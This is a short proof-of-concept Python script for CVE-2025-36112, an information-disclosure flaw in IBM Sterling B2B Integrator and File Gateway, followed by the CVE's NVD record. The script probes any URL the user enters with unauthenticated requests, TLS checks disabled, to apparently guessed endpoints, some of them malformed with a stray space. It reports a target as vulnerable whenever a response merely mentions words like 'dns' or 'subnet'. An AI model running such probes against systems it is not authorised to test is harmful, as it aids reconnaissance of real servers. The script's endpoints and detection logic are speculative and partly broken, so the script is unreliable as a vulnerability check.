CVE-2025-36112

import requests # CVE-2025-36112 PoC - Information Disclosure # Target: IBM Sterling B2B Integrator / Sterling File Gateway # Vulnerability: Sensitive server IP configuration information disclosure def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-36112 """ # Common endpoints that may expose IP configuration endpoints = [ '/ SterlingConfigurator/getIPConfig', '/ SterlingFileGateway/api/network/config', '/ SterlingB2B/api/v1/system/network', '/config/networkSettings', '/admin/networkConfiguration' ] for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Send unauthenticated request response = requests.get(url, timeout=10, verify=False) # Check if response contains sensitive IP configuration if response.status_code == 200: content = response.text.lower() # Indicators of IP configuration disclosure if any(keyword in content for keyword in ['ip address', 'subnet', 'gateway', 'dns', 'netmask']): print(f'[+] Potential vulnerability found at: {url}') print(f'[+] Response contains IP configuration data') return True except requests.exceptions.RequestException: continue return False def main(): target = input('Enter target URL: ') if check_vulnerability(target): print('[!] Target appears to be vulnerable to CVE-2025-36112') else: print('[-] Target does not appear to be vulnerable') if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-36112", "sourceIdentifier": "[email protected]", "published": "2025-11-24T19:15:48.283", "lastModified": "2025-12-01T16:05:56.670", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Sterling B2B Integrator and IBM Sterling File Gateway 6.0.0.0 through 6.1.2.7 and 6.2.0.0 through 6.2.0.5 and 6.2.1.1 could reveal sensitive server IP configuration information to an unauthorized user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_b2b_integrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0.0", "versionEndExcluding": "6.1.2.7_2", "matchCriteriaId": "AE818255-FEE2-453A-8230-81986F93954E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_b2b_integrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0.0", "versionEndExcluding": "6.2.0.5_1", "matchCriteriaId": "5E7BD82C-7A6C-44C3-BE64-FFF75700EED1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_b2b_integrator:6.2.1.1:*:*:*:*:*:*:*", "matchCriteriaId": "C4ACC673-C9A9-4149-821E-5A60603141DD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_file_gateway:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0.0", "versionEndExcluding": "6.1.2.7_2", "matchCriteriaId": "2831DF62-E968-4B8F-A4DA-E0752F9B5D9B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_file_gateway:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0.0", "versionEndExcluding": "6.2.0.5_1", "matchCriteriaId": "6CF6DF92-A6D4-4FBB-8662-5BE9D814D911"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_file_gateway:6.2.1.1:*:*:*:*:*:*:*", "matchCriteriaId": "1B08AE6F-BE1D-4353-BD4A-259284624BCB"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7252197", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}